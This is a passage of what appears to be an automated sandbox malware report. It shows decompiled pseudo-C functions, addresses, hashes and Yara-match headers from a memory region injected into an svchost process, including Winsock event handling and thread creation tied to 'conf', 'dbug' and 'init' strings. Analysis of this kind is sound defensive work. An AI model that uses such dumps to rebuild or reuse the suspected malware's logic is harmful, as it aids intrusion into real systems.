                                                            0x22baf542bcd
                                                            0x22baf542bce
                                                            0x22baf542bcf
                                                            0x22baf542bd0
                                                            0x22baf542bd5
                                                            0x22baf542bdf
                                                            0x22baf542be8
                                                            0x22baf542bec
                                                            0x22baf542bef
                                                            0x22baf542bf2
                                                            0x22baf542bf9
                                                            0x22baf542bfd
                                                            0x22baf542c05
                                                            0x22baf542c07
                                                            0x22baf542c13
                                                            0x22baf542c1f
                                                            0x22baf542c2e
                                                            0x22baf542c37
                                                            0x22baf542c40
                                                            0x22baf542c45
                                                            0x22baf542c49
                                                            0x22baf542c4d
                                                            0x22baf542c4f
                                                            0x22baf542c55
                                                            0x22baf542c6a

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 99a0b68018c0cd2454a0d70707031a19c663b083c8a7e1fd5ec40d5a9b9773d8
                                                            • Instruction ID: 905e63f6a12806c331347deb263ffcad97efab3eea1b65c503f27a2de2d68627
                                                            • Opcode Fuzzy Hash: 99a0b68018c0cd2454a0d70707031a19c663b083c8a7e1fd5ec40d5a9b9773d8
                                                            • Instruction Fuzzy Hash: 68F03A6A71125A25F87E3AD1844E3DD335243057E2E544F14567806ED7EF6640C00281
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF54B020(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* _a8, long long _a16, void* _a48, void* _a56) {
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				void* _t16;
                                                            				intOrPtr* _t37;
                                                            				intOrPtr _t46;
                                                            				long long _t50;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				if (__rdx == 0) goto 0xaf54b097;
                                                            				_t46 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				if (_t46 - 0x10 < 0) goto 0xaf54b04c;
                                                            				goto 0xaf54b04f;
                                                            				if (__rdx - __rcx < 0) goto 0xaf54b097;
                                                            				if (_t46 - 0x10 < 0) goto 0xaf54b05d;
                                                            				if ( *__rcx +  *((intOrPtr*)(__rcx + 0x10)) - __rdx <= 0) goto 0xaf54b097;
                                                            				if (_t46 - 0x10 < 0) goto 0xaf54b071;
                                                            				goto 0xaf54b074;
                                                            				_t37 = _a8;
                                                            				_pop(_t50);
                                                            				goto 0xaf54b150;
                                                            				if (_t50 - 0xfffffffe > 0) goto 0xaf54b143;
                                                            				if ( *((intOrPtr*)(_t37 + 0x18)) - _t50 >= 0) goto 0xaf54b0c7;
                                                            				_t15 = E0000022B22BAF54B2D0(_t14, _t16, _t37, _t37, _t50,  *((intOrPtr*)(_t37 + 0x10)));
                                                            				if (_t50 == 0) goto 0xaf54b130;
                                                            				if ( *((long long*)(_t37 + 0x18)) - 0x10 < 0) goto 0xaf54b106;
                                                            				goto 0xaf54b109;
                                                            				if (_t50 != 0) goto 0xaf54b0bb;
                                                            				 *((long long*)(_t37 + 0x10)) = _t50;
                                                            				if ( *((long long*)(_t37 + 0x18)) - 0x10 < 0) goto 0xaf54b0f0;
                                                            				 *((intOrPtr*)( *_t37)) = dil;
                                                            				return _t15;
                                                            			}









                                                            0x22baf54b020
                                                            0x22baf54b025
                                                            0x22baf54b03b
                                                            0x22baf54b03d
                                                            0x22baf54b045
                                                            0x22baf54b04a
                                                            0x22baf54b052
                                                            0x22baf54b058
                                                            0x22baf54b064
                                                            0x22baf54b06a
                                                            0x22baf54b06f
                                                            0x22baf54b083
                                                            0x22baf54b091
                                                            0x22baf54b092
                                                            0x22baf54b09b
                                                            0x22baf54b0a5
                                                            0x22baf54b0b1
                                                            0x22baf54b0b9
                                                            0x22baf54b0c0
                                                            0x22baf54b0c5
                                                            0x22baf54b0ca
                                                            0x22baf54b0d1
                                                            0x22baf54b0d5
                                                            0x22baf54b0da
                                                            0x22baf54b0ef

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 0-4289949731
                                                            • Opcode ID: 7d667a9bf3c03fc4f05e765795e3fe1c3f455e2aa4eb013ce9ef7e2083d4ad87
                                                            • Instruction ID: 870f360a349d25d224886e1bd7d2205e456b02d9c8e49ade7cdfe691c45c44ec
                                                            • Opcode Fuzzy Hash: 7d667a9bf3c03fc4f05e765795e3fe1c3f455e2aa4eb013ce9ef7e2083d4ad87
                                                            • Instruction Fuzzy Hash: 0B81B033A08A44B1EF2A8B99D54E39C7762E359FC9F540521CA2D07BDBDF36C5928340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0000022B22BAF56DB98(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
                                                            				void* _t73;
                                                            				unsigned int _t80;
                                                            				intOrPtr _t91;
                                                            				signed int _t97;
                                                            				signed int _t99;
                                                            				char _t101;
                                                            				signed int _t103;
                                                            				signed int _t105;
                                                            				unsigned int _t113;
                                                            				void* _t133;
                                                            				void* _t143;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rbp;
                                                            				_t133 = __rcx;
                                                            				if ( *((long long*)(__rcx + 0x468)) != 0) goto 0xaf56dbcc;
                                                            				_t73 = E0000022B22BAF567054(__rax);
                                                            				 *__rax = 0x16;
                                                            				E0000022B22BAF564328(_t73);
                                                            				goto 0xaf56dd76;
                                                            				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0xaf56dbb4;
                                                            				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                                                            				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0xaf56dd73;
                                                            				_t105 = __edi | 0xffffffff;
                                                            				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
                                                            				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
                                                            				goto 0xaf56dd4b;
                                                            				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                                                            				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0xaf56dd60;
                                                            				_t103 =  *(__rcx + 0x2c);
                                                            				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0xaf56dc26;
                                                            				_t128 =  *((char*)(__rcx + 0x41));
                                                            				goto 0xaf56dc28;
                                                            				_t80 = ( *( *((char*)(__rcx + 0x41)) + 0xaf581370) & 0x000000ff) >> 4;
                                                            				 *(__rcx + 0x2c) = _t80;
                                                            				if (_t80 == 8) goto 0xaf56dd86;
                                                            				_t113 = _t80;
                                                            				if (_t113 == 0) goto 0xaf56dd3f;
                                                            				if (_t113 == 0) goto 0xaf56dd26;
                                                            				if (_t113 == 0) goto 0xaf56dcf1;
                                                            				if (_t113 == 0) goto 0xaf56dcc5;
                                                            				if (_t113 == 0) goto 0xaf56dcbc;
                                                            				if (_t113 == 0) goto 0xaf56dc8f;
                                                            				if (_t113 == 0) goto 0xaf56dc82;
                                                            				if (_t80 - 0xfffffffffffffffc != 1) goto 0xaf56dd96;
                                                            				E0000022B22BAF56E024( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t143, 0xaf581370);
                                                            				goto 0xaf56dd47;
                                                            				E0000022B22BAF56DEA8(_t103, _t128, _t133);
                                                            				goto 0xaf56dd47;
                                                            				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0xaf56dca6;
                                                            				E0000022B22BAF56DB14(_t133, _t133, _t133 + 0x38);
                                                            				goto 0xaf56dd47;
                                                            				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
                                                            				_t97 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
                                                            				_t98 =  <  ? _t105 : _t97;
                                                            				 *(_t133 + 0x38) =  <  ? _t105 : _t97;
                                                            				goto 0xaf56dced;
                                                            				 *(_t133 + 0x38) =  *(_t133 + 0x38) & 0x00000000;
                                                            				goto 0xaf56dd4b;
                                                            				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0xaf56dcd1;
                                                            				goto 0xaf56dc99;
                                                            				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
                                                            				_t99 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
                                                            				 *(_t133 + 0x34) = _t99;
                                                            				if (_t99 >= 0) goto 0xaf56dced;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
                                                            				 *(_t133 + 0x34) =  ~_t99;
                                                            				goto 0xaf56dd47;
                                                            				_t91 =  *((intOrPtr*)(_t133 + 0x41));
                                                            				if (_t91 == 0x20) goto 0xaf56dd20;
                                                            				if (_t91 == 0x23) goto 0xaf56dd1a;
                                                            				if (_t91 == 0x2b) goto 0xaf56dd14;
                                                            				if (_t91 == 0x2d) goto 0xaf56dd0e;
                                                            				if (_t91 != 0x30) goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000008;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000001;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000020;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000002;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x34) =  *(_t133 + 0x34) & 0x00000000;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) & 0x00000000;
                                                            				 *(_t133 + 0x3c) =  *(_t133 + 0x3c) & 0x00000000;
                                                            				 *((char*)(_t133 + 0x40)) = 0;
                                                            				 *(_t133 + 0x38) = _t105;
                                                            				 *((char*)(_t133 + 0x54)) = 0;
                                                            				goto 0xaf56dd4b;
                                                            				if (E0000022B22BAF56DD9C(_t133) == 0) goto 0xaf56dd96;
                                                            				_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18))));
                                                            				 *((char*)(_t133 + 0x41)) = _t101;
                                                            				if (_t101 != 0) goto 0xaf56dbfd;
                                                            				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 1;
                                                            				 *((intOrPtr*)(_t133 + 0x470)) =  *((intOrPtr*)(_t133 + 0x470)) + 1;
                                                            				if ( *((intOrPtr*)(_t133 + 0x470)) != 2) goto 0xaf56dbf0;
                                                            				return  *((intOrPtr*)(_t133 + 0x28));
                                                            			}














                                                            0x22baf56db98
                                                            0x22baf56db9d
                                                            0x22baf56dbaf
                                                            0x22baf56dbb2
                                                            0x22baf56dbb4
                                                            0x22baf56dbb9
                                                            0x22baf56dbbf
                                                            0x22baf56dbc7
                                                            0x22baf56dbd1
                                                            0x22baf56dbd3
                                                            0x22baf56dbe0
                                                            0x22baf56dbe6
                                                            0x22baf56dbf0
                                                            0x22baf56dbf4
                                                            0x22baf56dbf8
                                                            0x22baf56dbfd
                                                            0x22baf56dc05
                                                            0x22baf56dc0e
                                                            0x22baf56dc15
                                                            0x22baf56dc17
                                                            0x22baf56dc24
                                                            0x22baf56dc2f
                                                            0x22baf56dc32
                                                            0x22baf56dc38
                                                            0x22baf56dc3e
                                                            0x22baf56dc40
                                                            0x22baf56dc49
                                                            0x22baf56dc52
                                                            0x22baf56dc5b
                                                            0x22baf56dc60
                                                            0x22baf56dc65
                                                            0x22baf56dc6a
                                                            0x22baf56dc6f
                                                            0x22baf56dc78
                                                            0x22baf56dc7d
                                                            0x22baf56dc85
                                                            0x22baf56dc8a
                                                            0x22baf56dc93
                                                            0x22baf56dc9c
                                                            0x22baf56dca1
                                                            0x22baf56dca6
                                                            0x22baf56dcaf
                                                            0x22baf56dcb4
                                                            0x22baf56dcb7
                                                            0x22baf56dcba
                                                            0x22baf56dcbc
                                                            0x22baf56dcc0
                                                            0x22baf56dcc9
                                                            0x22baf56dccf
                                                            0x22baf56dcd1
                                                            0x22baf56dcda
                                                            0x22baf56dcdd
                                                            0x22baf56dce2
                                                            0x22baf56dce4
                                                            0x22baf56dcea
                                                            0x22baf56dcef
                                                            0x22baf56dcf1
                                                            0x22baf56dcf6
                                                            0x22baf56dcfa
                                                            0x22baf56dcfe
                                                            0x22baf56dd02
                                                            0x22baf56dd06
                                                            0x22baf56dd08
                                                            0x22baf56dd0c
                                                            0x22baf56dd0e
                                                            0x22baf56dd12
                                                            0x22baf56dd14
                                                            0x22baf56dd18
                                                            0x22baf56dd1a
                                                            0x22baf56dd1e
                                                            0x22baf56dd20
                                                            0x22baf56dd24
                                                            0x22baf56dd26
                                                            0x22baf56dd2a
                                                            0x22baf56dd2e
                                                            0x22baf56dd32
                                                            0x22baf56dd36
                                                            0x22baf56dd39
                                                            0x22baf56dd3d
                                                            0x22baf56dd49
                                                            0x22baf56dd4f
                                                            0x22baf56dd51
                                                            0x22baf56dd56
                                                            0x22baf56dd5c
                                                            0x22baf56dd60
                                                            0x22baf56dd6d
                                                            0x22baf56dd85

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: e3d09414eb3035d096de30692d95f155daf3eba0449976533a82440791860895
                                                            • Instruction ID: 57c182bdf3a4f857c7c0474f135e02a65cbaf1ef2e5070db557a03017731b923
                                                            • Opcode Fuzzy Hash: e3d09414eb3035d096de30692d95f155daf3eba0449976533a82440791860895
                                                            • Instruction Fuzzy Hash: A6513073124644AAF7FA9EE8805C3AC3BB1E356B18F1C1A15C6664A2DBCF76C481DE41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53AC60(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t43;
                                                            				signed long long _t52;
                                                            				long long _t71;
                                                            				void* _t74;
                                                            				signed int* _t75;
                                                            				void* _t77;
                                                            				signed long long _t78;
                                                            
                                                            				_t71 = __rdi;
                                                            				_t43 = __ecx;
                                                            				 *((long long*)(_t77 + 0x18)) = __rbx;
                                                            				_t75 = _t77 - 0x10;
                                                            				_t78 = _t77 - 0x110;
                                                            				_t52 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *_t75 = _t52 ^ _t78;
                                                            				 *((long long*)(_t78 + 0x128)) = __rdi;
                                                            				E0000022B22BAF538B60(_t52 ^ _t78, __rbx, _t78 + 0x50, __rdi, __rsi);
                                                            				 *((char*)(_t75 - 0x40)) = 0x43;
                                                            				 *((long long*)(_t75 - 0x60)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588810;
                                                            				 *((long long*)(_t75 - 0x50)) = _t71;
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((intOrPtr*)(_t75 - 0x3c)) = 0;
                                                            				 *((long long*)(_t75 - 0x78)) = _t71;
                                                            				 *((long long*)(_t75 - 0x70)) = _t71;
                                                            				 *((long long*)(_t75 - 0x48)) = _t71;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t75 - 0x38)) = _t71;
                                                            				if (( *(_t75 - 0x10) & 0x0000ffff) != 1) goto 0xaf53ad94;
                                                            				 *((short*)(_t78 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t78 + 0x20)) = _t71;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78))))))(_t74) != 0) goto 0xaf53adfd;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t78 + 0x50);
                                                            				if ( *((intOrPtr*)(_t75 - 0x28)) == 0) goto 0xaf53ad3e;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78)))),  *((intOrPtr*)(_t75 - 0x28)));
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf588690;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588790;
                                                            				if ( *((intOrPtr*)(_t75 - 0x80)) == 0) goto 0xaf53ad75;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t75 - 0x80)));
                                                            				return E0000022B22BAF55A7C0(_t43, 0xaf588790,  *_t75 ^ _t78);
                                                            			}










                                                            0x22baf53ac60
                                                            0x22baf53ac60
                                                            0x22baf53ac60
                                                            0x22baf53ac66
                                                            0x22baf53ac6b
                                                            0x22baf53ac72
                                                            0x22baf53ac7c
                                                            0x22baf53ac8c
                                                            0x22baf53ac94
                                                            0x22baf53ac9b
                                                            0x22baf53aca6
                                                            0x22baf53acaa
                                                            0x22baf53acba
                                                            0x22baf53acc1
                                                            0x22baf53acc5
                                                            0x22baf53acc8
                                                            0x22baf53accc
                                                            0x22baf53acd0
                                                            0x22baf53acd3
                                                            0x22baf53acd7
                                                            0x22baf53acdb
                                                            0x22baf53acdf
                                                            0x22baf53ace8
                                                            0x22baf53acf0
                                                            0x22baf53acf8
                                                            0x22baf53ad09
                                                            0x22baf53ad0e
                                                            0x22baf53ad11
                                                            0x22baf53ad1d
                                                            0x22baf53ad2b
                                                            0x22baf53ad37
                                                            0x22baf53ad39
                                                            0x22baf53ad49
                                                            0x22baf53ad54
                                                            0x22baf53ad57
                                                            0x22baf53ad5b
                                                            0x22baf53ad67
                                                            0x22baf53ad6e
                                                            0x22baf53ad70
                                                            0x22baf53ad93

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseCreateEventHandleLibraryLoadSleep
                                                            • String ID: J
                                                            • API String ID: 1447892272-1141589763
                                                            • Opcode ID: 7a68649f046860f5ae64f33c2d75acc6395c4fa0ac2a7ac87a7b2314232dadf9
                                                            • Instruction ID: 57491cc88a70872310e8fe19ad4855bfc8c2cee0f1b75a388a87f9029ce3b2cc
                                                            • Opcode Fuzzy Hash: 7a68649f046860f5ae64f33c2d75acc6395c4fa0ac2a7ac87a7b2314232dadf9
                                                            • Instruction Fuzzy Hash: 18614A37604B40A9EB21CBA4E8A83DD77F4FB84798F500516DA8953BAADF3AC055C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF5513E0(intOrPtr __eax, long long __rbx, intOrPtr* __rcx, long long __rsi) {
                                                            				intOrPtr _t63;
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t66;
                                                            				signed char _t69;
                                                            				intOrPtr _t84;
                                                            				signed long long _t104;
                                                            				intOrPtr* _t108;
                                                            				void* _t121;
                                                            				long long _t125;
                                                            				void* _t127;
                                                            				signed long long _t128;
                                                            
                                                            				_t123 = __rsi;
                                                            				 *((long long*)(_t127 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t127 + 0x18)) = _t125;
                                                            				 *((long long*)(_t127 + 0x20)) = __rsi;
                                                            				_t128 = _t127 - 0x60;
                                                            				_t104 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t128 + 0x50) = _t104 ^ _t128;
                                                            				_t108 = __rcx;
                                                            				__imp__WSAEnumNetworkEvents();
                                                            				_t8 = _t121 + 2; // 0x3
                                                            				_t84 = _t8;
                                                            				if (__eax != 0xffffffff) goto 0xaf551487;
                                                            				__imp__#111();
                                                            				_t69 =  *(_t128 + 0x20);
                                                            				if ((_t69 & 0x00000010) == 0) goto 0xaf55143c;
                                                            				goto 0xaf55145f;
                                                            				if ((_t69 & 0x00000020) == 0) goto 0xaf551448;
                                                            				goto 0xaf55145f;
                                                            				if ((dil & _t69) == 0) goto 0xaf551454;
                                                            				goto 0xaf55145f;
                                                            				_t75 =  !=  ? _t84 : 0;
                                                            				__imp__WSAResetEvent();
                                                            				if (__eax == 0) goto 0xaf551583;
                                                            				 *((intOrPtr*)(__rcx + 0x1c)) =  !=  ? _t84 : 0;
                                                            				 *((intOrPtr*)(__rcx + 0x18)) = 1;
                                                            				 *((intOrPtr*)(__rcx + 0x20)) = __eax;
                                                            				 *((intOrPtr*)(__rcx + 0x24)) = 1;
                                                            				_t106 =  *__rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x80))() != 0) goto 0xaf5514b5;
                                                            				if (0 == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000010) == 0) goto 0xaf5514b5;
                                                            				if (E0000022B22BAF551590(__rcx, _t128 + 0x20) == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000001) == 0) goto 0xaf5514f2;
                                                            				if ( *((intOrPtr*)(_t128 + 0x24)) != 0) goto 0xaf5514d8;
                                                            				_t63 = E0000022B22BAF551690(__rcx, __rcx, __rsi, _t121);
                                                            				goto 0xaf5514f2;
                                                            				 *((intOrPtr*)(_t108 + 0x18)) = 1;
                                                            				 *((intOrPtr*)(_t108 + 0x1c)) = 4;
                                                            				 *((intOrPtr*)(_t108 + 0x20)) = _t63;
                                                            				 *((intOrPtr*)(_t108 + 0x24)) = 1;
                                                            				if (0 == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000002) == 0) goto 0xaf551527;
                                                            				if ( *((intOrPtr*)(_t128 + 0x28)) != 0) goto 0xaf551511;
                                                            				_t65 = E0000022B22BAF551870(_t106, _t108, _t108, _t123, _t125);
                                                            				goto 0xaf551527;
                                                            				 *((intOrPtr*)(_t108 + 0x18)) = 1;
                                                            				 *((intOrPtr*)(_t108 + 0x1c)) = _t84;
                                                            				 *((intOrPtr*)(_t108 + 0x20)) = _t65;
                                                            				 *((intOrPtr*)(_t108 + 0x24)) = 1;
                                                            				if (0 == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000020) == 0) goto 0xaf55155e;
                                                            				_t66 =  *((intOrPtr*)(_t128 + 0x38));
                                                            				 *((intOrPtr*)(_t108 + 0x18)) = 1;
                                                            				 *((intOrPtr*)(_t108 + 0x24)) = 1;
                                                            				if (_t66 != 0) goto 0xaf551552;
                                                            				 *((long long*)(_t108 + 0x1c)) = 5;
                                                            				goto 0xaf55155c;
                                                            				 *((intOrPtr*)(_t108 + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(_t108 + 0x20)) = _t66;
                                                            				return E0000022B22BAF55A7C0(_t69, _t106,  *(_t128 + 0x50) ^ _t128);
                                                            			}














                                                            0x22baf5513e0
                                                            0x22baf5513e0
                                                            0x22baf5513e5
                                                            0x22baf5513ea
                                                            0x22baf5513f0
                                                            0x22baf5513f4
                                                            0x22baf5513fe
                                                            0x22baf55140c
                                                            0x22baf551418
                                                            0x22baf55141e
                                                            0x22baf55141e
                                                            0x22baf551424
                                                            0x22baf551426
                                                            0x22baf55142c
                                                            0x22baf551435
                                                            0x22baf55143a
                                                            0x22baf55143f
                                                            0x22baf551446
                                                            0x22baf55144b
                                                            0x22baf551452
                                                            0x22baf55145c
                                                            0x22baf551463
                                                            0x22baf55146b
                                                            0x22baf551471
                                                            0x22baf551476
                                                            0x22baf55147d
                                                            0x22baf551480
                                                            0x22baf551487
                                                            0x22baf551495
                                                            0x22baf551499
                                                            0x22baf5514a4
                                                            0x22baf5514b7
                                                            0x22baf5514c2
                                                            0x22baf5514ca
                                                            0x22baf5514cf
                                                            0x22baf5514d6
                                                            0x22baf5514d8
                                                            0x22baf5514e1
                                                            0x22baf5514e8
                                                            0x22baf5514eb
                                                            0x22baf5514f4
                                                            0x22baf5514fb
                                                            0x22baf551503
                                                            0x22baf551508
                                                            0x22baf55150f
                                                            0x22baf551511
                                                            0x22baf55151a
                                                            0x22baf55151d
                                                            0x22baf551520
                                                            0x22baf551529
                                                            0x22baf551530
                                                            0x22baf551532
                                                            0x22baf551536
                                                            0x22baf55153d
                                                            0x22baf551546
                                                            0x22baf551548
                                                            0x22baf551550
                                                            0x22baf551552
                                                            0x22baf551559
                                                            0x22baf551582

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnumErrorEventEventsLastNetworkReset
                                                            • String ID:
                                                            • API String ID: 1050048411-3916222277
                                                            • Opcode ID: cf3fa6a3abd49a5a6800dd728abcb26caff2efb20de1f617484818b19025fff6
                                                            • Instruction ID: 10602093fc53aa8288770fbd1b2e21f810077ebb3af944f912556dc3f52c9716
                                                            • Opcode Fuzzy Hash: cf3fa6a3abd49a5a6800dd728abcb26caff2efb20de1f617484818b19025fff6
                                                            • Instruction Fuzzy Hash: EE516B73604A44A7F7768FA5D40C39E7BE1F788B58F160214DA8A4739ADFBAC8458B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF540890(long long* __rax, void* __rcx) {
                                                            
                                                            				if ( *((intOrPtr*)(__rcx + 0x40)) == 0) goto 0xaf5408d1;
                                                            				if ( *((intOrPtr*)(__rcx + 0x34)) != 2) goto 0xaf5408c6;
                                                            				if ( *((intOrPtr*)(__rcx + 0x48)) == 0) goto 0xaf5408c6;
                                                            				E0000022B22BAF53F560( *((intOrPtr*)(__rcx + 0x48)), "dbug");
                                                            				if (__rax == 0) goto 0xaf5408c6;
                                                            				 *__rax();
                                                            				return 1;
                                                            			}



                                                            0x22baf54089d
                                                            0x22baf5408a3
                                                            0x22baf5408ac
                                                            0x22baf5408b5
                                                            0x22baf5408bd
                                                            0x22baf5408c4
                                                            0x22baf5408d0

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID: conf$dbug$init
                                                            • API String ID: 2422867632-3701578037
                                                            • Opcode ID: 67ffc1cac0ceb5912aaaa8b724a9adde4b89fd8ba9e28160c56a2a9c3b9ca292
                                                            • Instruction ID: a61f1928e7a430d0747e5fd74bcf6a71a8edcb4d10536dc7a631f3239d3ede24
                                                            • Opcode Fuzzy Hash: 67ffc1cac0ceb5912aaaa8b724a9adde4b89fd8ba9e28160c56a2a9c3b9ca292
                                                            • Instruction Fuzzy Hash: 76416033601A00A6EA76EB9AF15D3DA73F1EB44B91F144025DB4D5B7A2DF3AC892C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E0000022B22BAF576404(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                            				intOrPtr _v0;
                                                            				signed long long _v8;
                                                            				int _t33;
                                                            				void* _t39;
                                                            				signed int _t40;
                                                            				int _t49;
                                                            				signed long long _t61;
                                                            				short* _t66;
                                                            				signed int* _t67;
                                                            				void* _t83;
                                                            				void* _t90;
                                                            				void* _t96;
                                                            				void* _t99;
                                                            				void* _t102;
                                                            				void* _t103;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a24 = __rbp;
                                                            				E0000022B22BAF5781B0(_t39, __rax, __rcx, _t83, __r8, _t96, _t99);
                                                            				_t61 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_a5176 = _t61 ^ _t90 - __rax;
                                                            				r14d = r9d;
                                                            				r10d = r10d & 0x0000003f;
                                                            				_t103 = _t102 + __r8;
                                                            				 *__rcx =  *__rcx & 0x00000000;
